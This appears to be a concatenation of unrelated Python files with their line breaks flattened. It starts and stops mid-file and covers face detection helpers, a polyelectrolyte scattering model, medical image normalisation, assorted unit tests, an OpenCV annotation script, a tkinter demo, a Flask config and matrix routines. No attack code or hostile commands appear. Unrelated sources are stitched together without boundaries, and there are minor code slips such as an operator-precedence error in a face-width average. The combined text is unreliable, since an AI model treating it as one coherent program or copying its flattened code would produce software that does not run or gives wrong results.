b.ymax) - max(a.ymin, b.ymin) if (dx >= 0) and (dy >= 0): return dx * dy def distance_to_face(face): focal_length = 200 avg_face_width = 150 avg_face_height = 0.65 return (focal_length * avg_face_width / face[2]) / 304.8 def distance_between_faces(f1, f2): deltax = abs(f1[0] - f2[0]) avg_face_width = 0.5 avg_face_width_pixels = (f1[2] + f2[2] / 2) horizontal_distance = deltax * avg_face_width / avg_face_width_pixels vertical_distance = abs(distance_to_face(f1) - distance_to_face(f2)) return (horizontal_distance ** 2 + vertical_distance ** 2) ** (0.5) def overlap(b1, b2): from collections import namedtuple Rectangle = namedtuple('Rectangle', 'xmin ymin xmax ymax') ra = Rectangle(b1[0], b1[1], b1[0] + b1[2], b1[1] + b1[3]) rb = Rectangle(b2[0], b2[1], b2[0] + b2[2], b2[1] + b2[3]) ret = area(ra, rb) return ret if ret is not None else 0 def matching(masks, faces, threshold=0.5): faces = copy.deepcopy(faces) matches = [] for mask in copy.deepcopy(masks): intersection = [overlap(mask, face) for face in faces] if len(intersection) > 0: best_match = np.argsort(intersection)[-1] if intersection[best_match] > threshold * mask[2] * mask[3]: matches.append(faces.pop(best_match)) return faces, matches def plot_faces_annotated(fig, ax, labels, color='b'): for box in labels: rect = patches.Rectangle((box[0], box[1]), box[2], box[3], linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) def plot_masks_annotated(fig, ax, annotation, color='r'): for label, box in zip(annotation["labels"], annotation["boxes"]): if label != 1: continue xmin, ymin, xmax, ymax = box rect = patches.Rectangle((xmin, ymin), (xmax - xmin), (ymax - ymin), linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) 0 r""" Definition ---------- This model calculates the structure factor of a polyelectrolyte solution with the RPA expression derived by Borue and Erukhimovich\ [#Borue]_. Note however that the fitting procedure here does not follow the notation in that reference as 's' and 't' are **not** decoupled. Instead the scattering intensity $I(q)$ is calculated as .. math:: I(q) = K\frac{q^2+k^2}{4\pi L_b\alpha ^2} \frac{1}{1+r_{0}^2(q^2+k^2)(q^2-12hC_a/b^2)} + background k^2 = 4\pi L_b(2C_s + \alpha C_a) r_{0}^2 = \frac{1}{\alpha \sqrt{C_a} \left( b/\sqrt{48\pi L_b}\right)} where $K$ is the contrast factor for the polymer which is defined differently than in other models and is given in barns where $1 barn = 10^{-24} cm^2$. $K$ is defined as: .. math:: K = a^2 a = b_p - (v_p/v_s) b_s where $b_p$ and $b_s$ are sum of the scattering lengths of the atoms constituting the monomer of the polymer and the sum of the scattering lengths of the atoms constituting the solvent molecules respectively, and $v_p$ and $v_s$ are the partial molar volume of the polymer and the solvent respectively $L_b$ is the Bjerrum length(|Ang|) - **Note:** This parameter needs to be kept constant for a given solvent and temperature! $h$ is the virial parameter (|Ang^3|/mol) - **Note:** See [#Borue]_ for the correct interpretation of this parameter. It incorporates second and third virial coefficients and can be Negative. $b$ is the monomer length(|Ang|), $C_s$ is the concentration of monovalent salt(mol/L), $\alpha$ is the ionization degree (ionization degree : ratio of charged monomers to total number of monomers), $C_a$ is the polymer molar concentration(mol/L), and $background$ is the incoherent background. For 2D data the scattering intensity is calculated in the same way as 1D, where the $\vec q$ vector is defined as .. math:: q = \sqrt{q_x^2 + q_y^2} References ---------- .. [#Borue] , , *Macromolecules*, 21 (1988) 3240 .. [#] , , *Journal de Physique*, 51 (1990) 545 .. [#] , , , , *J. Journal de Physique II France*, 3 (1993) 573 .. [#] , , *Europhysics Letters*, 11 (1990) 179 Authorship and Verification ---------------------------- * **Author:** NIST IGOR/DANSE **Date:** pre 2010 * **Last Modified by:** **Date:** July 24, 2016 * **Last Reviewed by:** and **Date:** October 07, 2016 """ from numpy import inf, pi, sqrt name = "be_polyelectrolyte" title = "Polyelectrolyte with the RPA expression derived by Borue and Erukhimovich" description = """ Evaluate F(x) = K 1/(4 pi Lb (alpha)^(2)) (q^(2)+k2)/(1+(r02)^(2)) (q^(2)+k2) (q^(2)-(12 h C/b^(2))) has 3 internal parameters : The inverse Debye Length: K2 = 4 pi Lb (2 Cs+alpha C) r02 =1/alpha/Ca^(0.5) (B/(48 pi Lb)^(0.5)) Ca = 6.022136e-4 C """ category = "shape-independent" # pylint: disable=bad-whitespace, line-too-long # ["name", "units", default, [lower, upper], "type", "description"], parameters = [ ["contrast_factor", "barns", 10.0, [-inf, inf], "", "Contrast factor of the polymer"], ["bjerrum_length", "Ang", 7.1, [0, inf], "", "Bjerrum length"], ["virial_param", "Ang^3/mol", 12.0, [-inf, inf], "", "Virial parameter"], ["monomer_length", "Ang", 10.0, [0, inf], "", "Monomer length"], ["salt_concentration", "mol/L", 0.0, [-inf, inf], "", "Concentration of monovalent salt"], ["ionization_degree", "", 0.05, [0, inf], "", "Degree of ionization"], ["polymer_concentration", "mol/L", 0.7, [0, inf], "", "Polymer molar concentration"], ] # pylint: enable=bad-whitespace, line-too-long def Iq(q, contrast_factor=10.0, bjerrum_length=7.1, virial_param=12.0, monomer_length=10.0, salt_concentration=0.0, ionization_degree=0.05, polymer_concentration=0.7): """ :param q: Input q-value :param contrast_factor: Contrast factor of the polymer :param bjerrum_length: Bjerrum length :param virial_param: Virial parameter :param monomer_length: Monomer length :param salt_concentration: Concentration of monovalent salt :param ionization_degree: Degree of ionization :param polymer_concentration: Polymer molar concentration :return: 1-D intensity """ concentration = polymer_concentration * 6.022136e-4 k_square = 4.0 * pi * bjerrum_length * (2*salt_concentration + ionization_degree * concentration) r0_square = 1.0/ionization_degree/sqrt(concentration) * \ (monomer_length/sqrt((48.0*pi*bjerrum_length))) term1 = contrast_factor/(4.0 * pi * bjerrum_length * ionization_degree**2) * (q**2 + k_square) term2 = 1.0 + r0_square**2 * (q**2 + k_square) * \ (q**2 - (12.0 * virial_param * concentration/(monomer_length**2))) return term1/term2 Iq.vectorized = True # Iq accepts an array of q values demo = dict(scale=1, background=0.1, contrast_factor=10.0, bjerrum_length=7.1, virial_param=12.0, monomer_length=10.0, salt_concentration=0.0, ionization_degree=0.05, polymer_concentration=0.7) tests = [ # Accuracy tests based on content in test/utest_other_models.py [{'contrast_factor': 10.0, 'bjerrum_length': 7.1, 'virial_param': 12.0, 'monomer_length': 10.0, 'salt_concentration': 0.0, 'ionization_degree': 0.05, 'polymer_concentration': 0.7, 'background': 0.001, }, 0.001, 0.0948379], # Additional tests with larger range of parameters [{'contrast_factor': 10.0, 'bjerrum_length': 100.0, 'virial_param': 3.0, 'monomer_length': 1.0, 'salt_concentration': 10.0, 'ionization_degree': 2.0, 'polymer_concentration': 10.0, 'background': 0.0, }, 0.1, -3.75693800588], [{'contrast_factor': 10.0, 'bjerrum_length': 100.0, 'virial_param': 3.0, 'monomer_length': 1.0, 'salt_concentration': 10.0, 'ionization_degree': 2.0, 'polymer_concentration': 10.0, 'background': 100.0 }, 5.0, 100.029142149], [{'contrast_factor': 100.0, 'bjerrum_length': 10.0, 'virial_param': 180.0, 'monomer_length': 1.0, 'salt_concentration': 0.1, 'ionization_degree': 0.5, 'polymer_concentration': 0.1, 'background': 0.0, }, 200., 1.80664667511e-06], ] 0 ########################################################################## # MediPy - Copyright (C) Universite de Strasbourg # Distributed under the terms of the CeCILL-B license, as published by # the CEA-CNRS-INRIA. Refer to the LICENSE file or to # http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html # for details. ########################################################################## import itk import numpy import medipy.base import medipy.base.exception import medipy.itk import medipy.logic def mean_stdev_normalization(reference, image, mask_ref=None, mask_image=None): """ Return a normalized version of image, so that the mean and standard deviation match those of reference. """ if mask_ref : meanref=reference[numpy.nonzero(mask_ref)].mean() stdref=reference[numpy.nonzero(mask_ref)].std() else : meanref=reference.data.mean() stdref=reference.data.std() if mask_image : meanimage=image[numpy.nonzero(mask_image)].mean() stdimage=image[numpy.nonzero(mask_image)].std() else : meanimage=image.data.mean() stdimage=image.data.std() alpha = stdref/stdimage beta = meanref-meanimage*alpha data = alpha*image.data+beta output = medipy.base.Image(data=data) output.copy_information(image) return output def one_parameter_linear_regression_normalization(src,ref): """ Return a normalized version of image, so that the mean and standard deviation match those of reference. """ if src.shape != ref.shape : raise medipy.base.exception.Exception("Images must have the same size") alpha=numpy.sum(numpy.multiply(src,ref),dtype=float)/numpy.sum(numpy.multiply(src,src),dtype=float) data=alpha*src.data output = medipy.base.Image(data=data) output.copy_information(src) return output def joint_histogram( fixed, moving, mask=None, mask_value=1, bins_count_fixed=200, bins_count_moving=200, method="Nearest Neighbor"): """ Intensity normalization based on joint histogram. """ fixed_itk = medipy.itk.medipy_image_to_itk_image(fixed, False) moving_itk = medipy.itk.medipy_image_to_itk_image(moving, False) mask_itk = None if mask: mask_itk = medipy.itk.medipy_image_to_itk_image(mask, False) ################################## # 1. Compute the joint histogram # ################################## histogram_calculator = itk.JointHistogramCalculator[ moving_itk, mask_itk or moving_itk].New( Image1=moving_itk, Image2=fixed_itk, BinsCount1=bins_count_moving, BinsCount2=bins_count_fixed) if mask: histogram_calculator.SetMask(mask_itk) # FIXME: should be in ctor if method == "Nearest Neighbor": histogram_calculator.SetMethodToNearestNeighbor() elif method == "Linear": histogram_calculator.SetMethodToLinearInterpolation() histogram_calculator.Compute() histogram = histogram_calculator.GetHistogram() #################################### # 2. Compute the transfer function # #################################### transfer_function_calculator = itk.JointHistogramTransferFunctionCalculator[ histogram].New( Histogram=histogram, ResampleFactor=10 ) transfer_function_calculator.Compute() transfer_function = transfer_function_calculator.GetTransferFunction() ######################################## # 3. Adjust the moving image intensity # ######################################## transform_intensity = itk.TransformIntensityImageFilter[ moving_itk, moving_itk].New( Input=moving_itk, TransferFunction=transfer_function) output_itk = transform_intensity()[0] output = medipy.itk.itk_image_to_medipy_image(output_itk, None, True) return output x = 1 #x = 1.2 #x = 1.2e5 #x = 1.2e+5 #x = 1.2e-5 x = () x = (1,) x = (1,2) x = ('a',None,3) from .base import SharedMemory __all__ = ["SharedMemory"] testcases = [ { 'input': { "string": "clementisacap" }, 'output': 'mentisac', }, ] from lib import run_tests def main(): run_tests( testcases=testcases, function=longestSubstringWithoutDuplication, ) def longestSubstringWithoutDuplication(string): cached = {} ret = '' pt = 0 for i, s in enumerate(string): if s in cached: if cached[s] < pt: cached[s] = i else: pt = max(cached[s] + 1, pt + 1) cached[s] = i if (i - pt + 1) > len(ret): ret = string[pt:i + 1] return ret import pytest import numpy as np from ...core import Data, DataCollection from ...qt.glue_application import GlueApplication from ...qt.widgets import ScatterWidget, ImageWidget, HistogramWidget from ..export_plotly import build_plotly_call try: import plotly PLOTLY_INSTALLED = True except ImportError: PLOTLY_INSTALLED = False pytest.mark.skipif('not PLOTLY_INSTALLED') class TestPlotly(object): def setup_method(self, method): d = Data(x=[1, 2, 3], y=[2, 3, 4], label='data') dc = DataCollection([d]) self.app = GlueApplication(dc) self.data = d def test_scatter(self): app = self.app d = self.data d.style.markersize = 6 d.style.color = '#ff0000' d.style.alpha = .4 v = app.new_data_viewer(ScatterWidget, data=d) v.xatt = d.id['y'] v.yatt = d.id['x'] args, kwargs = build_plotly_call(app) expected = dict(type='scatter', mode='markers', name=d.label, marker=dict(size=6, color='rgba(255, 0, 0, 0.4)', symbol='circle')) for k, v in expected.items(): assert args[0][k] == v np.testing.assert_array_equal(args[0]['x'], d['y']) np.testing.assert_array_equal(args[0]['y'], d['x']) assert 'layout' in kwargs layout = kwargs['layout'] assert layout['showlegend'] def test_scatter_subset(self): app = self.app d = self.data s = d.new_subset(label='subset') s.subset_state = d.id['x'] > 1 s.style.marker = 's' v = app.new_data_viewer(ScatterWidget, data=d) v.xatt = d.id['x'] v.yatt = d.id['x'] args, kwargs = build_plotly_call(app) # check that subset is on Top assert len(args) == 2 assert args[0]['name'] == 'data' assert args[1]['name'] == 'subset' def test_axes(self): app = self.app v = app.new_data_viewer(ScatterWidget, data=self.data) v.xlog = True v.xmin = 10 v.xmax = 100 v.ylog = False v.ymin = 2 v.ymax = 4 args, kwargs = build_plotly_call(app) xaxis = dict(type='log', rangemode='normal', range=[1, 2], title='y', zeroline=False) yaxis = dict(type='linear', rangemode='normal', range=[2, 4], title='x', zeroline=False) layout = kwargs['layout'] assert layout['xaxis'] == xaxis assert layout['yaxis'] == yaxis def test_histogram(self): app = self.app d = self.data d.style.color = '#000000' v = app.new_data_viewer(HistogramWidget, data=d) v.component = d.id['y'] v.xmin = 0 v.xmax = 10 v.bins = 20 args, kwargs = build_plotly_call(app) expected = dict( name='data', type='bar', marker=dict( color='rgba(0, 0, 0, 0.5)' ), ) for k in expected: assert expected[k] == args[0][k] assert kwargs['layout']['barmode'] == 'overlay' def test_2plot(self): app = self.app d = self.data v = app.new_data_viewer(HistogramWidget, data=d) v2 = app.new_data_viewer(ScatterWidget, data=d) args, kwargs = build_plotly_call(app) assert len(args) == 2 assert 'xaxis' not in args[0] and 'yaxis' not in args[0] assert args[1]['xaxis'] == 'x2' assert args[1]['yaxis'] == 'y2' layout = kwargs['layout'] assert layout['xaxis']['domain'] == [0, .45] assert layout['xaxis2']['domain'] == [.55, 1] assert layout['yaxis2']['anchor'] == 'x2' def test_can_multiplot(self): # check that no errors are raised with 2-4 plots app = self.app d = self.data for i in range(2, 5): app.new_data_viewer(HistogramWidget, data=d) args, kwargs = build_plotly_call(app) def test_4plot(self): app = self.app d = self.data v = [app.new_data_viewer(HistogramWidget, data=d) for _ in range(4)] args, kwargs = build_plotly_call(app) assert len(args) == 4 assert 'xaxis' not in args[0] and 'yaxis' not in args[0] assert args[1]['xaxis'] == 'x2' assert args[1]['yaxis'] == 'y2' assert args[2]['xaxis'] == 'x3' assert args[2]['yaxis'] == 'y3' assert args[3]['xaxis'] == 'x4' assert args[3]['yaxis'] == 'y4' layout = kwargs['layout'] assert layout['xaxis']['domain'] == [0, .45] assert layout['yaxis']['domain'] == [0, .45] assert layout['xaxis2']['domain'] == [.55, 1] assert layout['yaxis2']['domain'] == [0, 0.45] assert layout['yaxis2']['anchor'] == 'x2' assert layout['xaxis3']['domain'] == [0, 0.45] assert layout['xaxis3']['anchor'] == 'y3' assert layout['yaxis3']['domain'] == [0.55, 1] assert layout['xaxis4']['anchor'] == 'y4' assert layout['yaxis4']['domain'] == [0.55, 1] assert layout['yaxis4']['anchor'] == 'x4' import platform import unittest @unittest.skipIf(platform.system() != 'Windows', 'Windows only tests') class WindowsTestCase(unittest.TestCase): def test_windows_path_sanity(self): ''' This test case is a no-op, and exists only to ensure that windows paths work as part of the windows sanity ci test. ''' print('sanity passed - test was run') def test_mslex_install(self): '''Ensure that mslex is installed on Windows''' try: import mslex # type: ignore # pylint: disable=W0611,C0415 except ImportError: self.fail('Unable to import mslex') def test_mslex_import(self): '''Ensure that mslex is used as shlex''' from taskipy.task_runner import shlex # pylint: disable=C0415 self.assertEqual(shlex.__name__, 'mslex') LaudateCorpus1/oneview-ansible #!/usr/bin/python # -*- coding: utf-8 -*- ### # Copyright (2021) Hewlett Packard Enterprise Development LP # # Licensed under the Apache License, Version 2.0 (the "License"); # You may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ### import mock import pytest from hpe_test_utils import OneViewBaseTest from oneview_module_loader import IdPoolsIpv4SubnetModule FAKE_MSG_ERROR = 'Fake message error' DEFAULT_SUBNET_TEMPLATE = dict( name='Ipv4Subnet', uri='/rest/subnet/test', type='Subnet', networkId='10.1.0.0', domain='example.com' ) PARAMS_FOR_PRESENT = dict( config='config.json', state='present', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId']) ) PARAMS_FOR_PRESENT_WITH_URI = dict( config='config.json', state='present', data=dict(uri=DEFAULT_SUBNET_TEMPLATE['uri']) ) PARAMS_FOR_INVALID = dict( config='config.json', state='present', data=dict(type=DEFAULT_SUBNET_TEMPLATE['type']) ) PARAMS_WITH_CHANGES = dict( config='config.json', state='present', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], domain='newdomain.com') ) PARAMS_FOR_ABSENT = dict( config='config.json', state='absent', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId']) ) PARAMS_FOR_COLLECT = dict( config='config.json', state='collect', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], idList=['10.1.1.1', '10.1.1.2']) ) PARAMS_FOR_ALLOCATE = dict( config='config.json', state='allocate', data=dict(networkId=DEFAULT_SUBNET_TEMPLATE['networkId'], count=2) ) @pytest.mark.resource(TestIdPoolsIpv4SubnetModule='id_pools_ipv4_subnets') class TestIdPoolsIpv4SubnetModule(OneViewBaseTest): """ OneViewBaseTestCase provides the mocks used in this test case """ def test_should_create_new_id_pools_ipv4_subnet(self): self.resource.get_by_field.return_value = None self.resource.create.return_value = self.resource self.resource.data = DEFAULT_SUBNET_TEMPLATE self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_CREATED, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_not_update_when_data_is_equals(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_get_the_same_resource_by_networkid(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_should_get_the_same_resource_by_uri(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_uri.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_PRESENT_WITH_URI IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_PRESENT, ansible_facts=dict(id_pools_ipv4_subnet=DEFAULT_SUBNET_TEMPLATE) ) def test_update_when_data_has_modified_attributes(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['domain'] = 'diffdomain.com' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.update.return_value = data_merged self.mock_ansible_module.params = PARAMS_WITH_CHANGES IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_UPDATED, ansible_facts=dict(id_pools_ipv4_subnet=data_merged) ) def test_should_allocate_when_valid_ids_present(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['count'] = 2 data_merged['allocatorUri'] = '/rest/fake' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.allocate.return_value = {'idList': ['172.16.31.10', '172.16.31.10']} self.mock_ansible_module.params = PARAMS_FOR_ALLOCATE IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_ALLOCATE, ansible_facts=dict(id_pools_ipv4_subnet={'idList': ['172.16.31.10', '172.16.31.10']}) ) def test_should_collect_when_valid_ids_allocated(self): data_merged = DEFAULT_SUBNET_TEMPLATE.copy() data_merged['idList'] = ['10.1.1.1', '10.1.1.2'] data_merged['allocatorUri'] = '/rest/fake' self.resource.data = data_merged self.resource.get_by_field.return_value = self.resource self.resource.collect.return_value = {'idList': ['10.1.1.1', '10.1.1.1']} self.mock_ansible_module.params = PARAMS_FOR_COLLECT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_COLLECT, ansible_facts=dict(id_pools_ipv4_subnet={'idList': ['10.1.1.1', '10.1.1.1']}) ) def test_should_remove_id_pools_ipv4_subnet(self): self.resource.data = DEFAULT_SUBNET_TEMPLATE self.resource.get_by_field.return_value = self.resource self.mock_ansible_module.params = PARAMS_FOR_ABSENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=True, msg=IdPoolsIpv4SubnetModule.MSG_DELETED ) def test_should_do_nothing_when_id_pools_ipv4_subnet_not_exist(self): self.resource.get_by_field.return_value = None self.mock_ansible_module.params = PARAMS_FOR_ABSENT IdPoolsIpv4SubnetModule().run() self.mock_ansible_module.exit_json.assert_called_once_with( changed=False, msg=IdPoolsIpv4SubnetModule.MSG_ALREADY_ABSENT ) if __name__ == '__main__': pytest.main([__file__]) import os import cv2 import numpy as np import shutil ###########################Display image################################################################## def show(Im,Name="img"): cv2.imshow(Name,Im.astype(np.uint8)) cv2.waitKey() cv2.destroyAllWindows() ################################################################################################################################################################## #Split binary mask correspond to a singele segment into connected components def GetConnectedSegment(Seg): [NumCCmp, CCmpMask, CCompBB, CCmpCntr] = cv2.connectedComponentsWithStats(Seg.astype(np.uint8)) # apply connected component Mask=np.zeros([NumCCmp,Seg.shape[0],Seg.shape[1]],dtype=bool) BBox=np.zeros([NumCCmp,4]) Sz=np.zeros([NumCCmp],np.uint32) for i in range(1,NumCCmp): Mask[i-1] = (CCmpMask == i) BBox[i-1] = CCompBB[i][:4] Sz[i-1] = CCompBB[i][4] #segment Size return Mask,BBox,Sz,NumCCmp-1 ############################################################################################################################ ############################################################################################## MainDir=r"C:\Users\Sagi\Desktop\CHEMSCAPE\ChemLabScapeDataset\TestAnnoatations\\" for AnnDir in os.listdir(MainDir): VesDir = MainDir + "/" + AnnDir + r"//Vessel//" SemDir = MainDir + "/" + AnnDir + r"//Semantic//" EmptyDir = MainDir + "/" + AnnDir + r"//EmptyRegions//" Img = cv2.imread(MainDir +"/"+ AnnDir + "/Image.png") if os.path.isdir(EmptyDir): shutil.rmtree(EmptyDir) os.mkdir(EmptyDir) #___________________________________________________________________________________________________________________ NumEmptyInst=0 IsFilled=False IsVapor=False if os.path.exists(SemDir+"16_Filled.png"): Filled=cv2.imread(SemDir+"16_Filled.png")[:,:,0]>0 IsFilled = True if os.path.exists(SemDir+"14_Vapor"): Vapor=cv2.imread(SemDir+"14_Vapor.png")[:,:,0]>0 IsVapor = True for Name in os.listdir(VesDir): path=VesDir+Name if not os.path.exists(path): continue Ves=cv2.imread(path) Ves[:,:,1]*=0 if not 7 in Ves: Ves[:,:,2]*=0 cv2.imwrite(path,Ves) print(path) # show(Ves*30) Ves[:, :, 1]=Ves[:, :, 0] Mask=Ves[:, :, 0]>0 if IsFilled: Mask[Filled]=0 if IsVapor: Mask[Vapor]=0 # show((Img/2+Ves*100).astype(np.uint8)) #show(Ves * 100, str(NumEmptyInst)+"ALL VESSEL") Mask,BBox,Sz,NumCCmp=GetConnectedSegment(Mask.astype(np.uint8)) for i in range(NumCCmp): if Mask[i].sum()<1200: continue Inst=Ves.copy() Inst[:, :, 0]=Inst[:, :, 1]*Mask[i] # NumEmptyInst+=1 cv2.imwrite(EmptyDir+"//"+str(NumEmptyInst)+".png",Inst) # show(Inst[:,:,0]*30,str(NumEmptyInst)) # if 7 in Ves: # print("444") # show(Ves*20) # show((Ves==7).astype(np.uint8)*100) import tkinter from tkinter import messagebox # Basic Frame class Application(tkinter.Frame): def __init__(self, master=None): super().__init__(master) self.pack() self.create_widgets() def create_widgets(self): self.hi = tkinter.Button(self) # Define A button self.hi["text"] = "Say Hello" self.hi["command"] = self.say_hi self.hi.pack(side="top") self.quit = tkinter.Button(self, text="QUIT", fg="red", command=root.destroy) # define button self.quit.pack(side="bottom") def say_hi(self): print("They said hello!") messagebox.showinfo("Info","Hello!") root = tkinter.Tk() app = Application(master=root) app.mainloop() 0 import os class Config: SECRET_KEY = "testkey" SQLALCHEMY_TRACK_MODIFICATIONS = False LOG_FILE = "api.log" class DevelopmentConfig(Config): SQLALCHEMY_DATABASE_URI = "postgresql://testusr:password@127.0.0.1:5432/testdb" # SQLALCHEMY_DATABASE_URI = 'postgres://127.0.0.1:5432' DEBUG = True class ProductionConfig(Config): SQLALCHEMY_DATABASE_URI = os.environ.get("DATABASE_URL") DEBUG = False class DockerDevConfig(Config): SQLALCHEMY_DATABASE_URI = "postgresql://testusr:password@postgres/testdb" DEBUG = True config = {"dev": DevelopmentConfig, "prod": ProductionConfig, "docker": DockerDevConfig} 0 # -*- coding: utf-8 -*- from openprocurement.api.utils import opresource from openprocurement.api.views.cancellation_document import TenderCancellationDocumentResource as BaseResource @opresource(name='Tender Two Stage Cancellation Documents', collection_path='/tenders/{tender_id}/cancellations/{cancellation_id}/documents', path='/tenders/{tender_id}/cancellations/{cancellation_id}/documents/{document_id}', procurementMethodType='aboveThresholdTS', description="Tender Two Stage cancellation documents") class TenderCancellationDocumentResource(BaseResource): """ Cancellation Document """ arielbello/dota-ladder import os import time import constants as Const def is_first_run() -> bool: return not os.path.exists(Const.Files.APP_LOG) def log_write(log_text): with open(Const.Files.APP_LOG, "a+") as file: file.write(f"{time.ctime()}: {log_text}\n") def create_folder_if_needed(path): if not os.path.exists(path): os.makedirs(path) import copy from lafs.matrix_functions import is_singular, is_square import lafs # IMPLEMENT CHECKS FOR RANK/SINGULARITY & SQUARE MATRICES # Returns a row echelon form of the input matrix. def ref(matrix): ret = copy.deepcopy(matrix) k_row, k_col = 0, 0 while k_row < ret.dim(0) and k_col < ret.dim(0): col_abs = [abs(ret(k, k_col)) for k in range(k_row, ret.dim(0))] i_max = k_row + col_abs.index(max(col_abs)) if ret(i_max, k_col) == 0: k_col += 1 else: ret.swap_rows(k_row, i_max) for i in range(k_row + 1, ret.dim(0)): factor = ret(i, k_col) / ret(k_row, k_col) ret[i][k_col] = 0 for j in range(k_col + 1, ret.dim(1)): ret[i][j] = ret(i, j) - ret(k_row, j) * factor k_row += 1 k_col += 1 return ret # Returns the reduced row echelon form of the input matrix. def rref(matrix): ret = copy.deepcopy(matrix) lead = 0 n_row = ret.dim(0) n_col = ret.dim(1) for r in range(n_row): if lead == n_col: return ret i = r while ret(i, lead) == 0: i += 1 if i == n_row: i = r lead += 1 if lead == n_col: return ret if i != r: ret.swap_rows(i, r) div = ret(r, lead) for j in range(ret.dim(1)): ret[r][j] /= div for l in range(n_row): if l != r: factor = ret(l, lead) for j in range(ret.dim(1)): ret[l][j] -= factor * ret(r,j) lead += 1 return ret # Returns the direct inverse via Gaussian elimination of the input matrix. def inv(matrix): if is_singular(matrix): raise ValueError("Input matrix must be invertible.") base_matrix = copy.deepcopy(matrix) ret = copy.deepcopy(matrix.identity()) lead = 0 n_row = base_matrix.dim(0) n_col = base_matrix.dim(1) for r in range(n_row): if lead == n_col: return ret i = r while base_matrix(i, lead) == 0: i += 1 if i == n_row: i = r lead += 1 if lead == n_col: return ret if i != r: base_matrix.swap_rows(i, r) ret.swap_rows(i, r) div = base_matrix(r, lead) for j in range(base_matrix.dim(1)): base_matrix[r][j] /= div ret[r][j] /= div for l in range(n_row): if l != r: factor = base_matrix(l, lead) for j in range(base_matrix.dim(1)): base_matrix[l][j] -= factor * base_matrix(r,j) ret[l][j] -= factor * ret(r,j) lead += 1 return ret # Returns the rank of the input matrix. def rank(matrix): return sum([x[0] != 0 for x in lafs.matrix_functions.diag(rref(matrix))()]) # Returns the nullity of the input matrix. def nullity(matrix): return min(lafs.matrix_functions.dim(matrix)) - rank(matrix) # Returns the solution "x" of the linear system "A * x = b". def linsolve(A, b): return lafs.gauss.inv(A) * b if __name__ == "__main__": pass from django.conf import settings from src.wall.models import Post class Feed: """ Service feeds """ def get_post_list(self, user: settings.AUTH_USER_MODEL): return Post.objects.filter(user__owner__subscriber=user).order_by('-create_date')\ .select_related('user').prefetch_related('comments') def get_single_post(self, pk: int): return Post.objects.select_related('user').prefetch_related('comments').get(id=pk) feed_service = Feed() #!/usr/bin/python # # Project Saturn # _____________________________________________________________________________ # # _.oo. # August 2019 _.u[[/;:,. .odMMMMMM' # .o888UU[[[/;:-. .o@P^ MMM^ # engine.py oN88888UU[[[/;::-. dP^ # main program dNMMNN888UU[[[/;:--. .o@P^ # ,MMMMMMN888UU[[/;::-. o@^ # NNMMMNN888UU[[[/~.o@P^ # 888888888UU[[[/o@^-.. # oI8888UU[[[/o@P^:--.. # .@^ YUU[[[/o@^;::---.. # oMP ^/o@P^;:::---.. # .dMMM .o@^ ^;::---... # dMMMMMMM@^` `^^^^ # YMMMUP^ # ^^ # _____________________________________________________________________________ # # # Copyright 2019 # # THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # _____________________________________________________________________________ # ---------------- # import libraries # ---------------- # standard libraries # ----- #import tensorflow as tf import tensorflow.compat.v1 as tf tf.disable_eager_execution() import numpy as np import matplotlib import tfplot import sys import os import re import 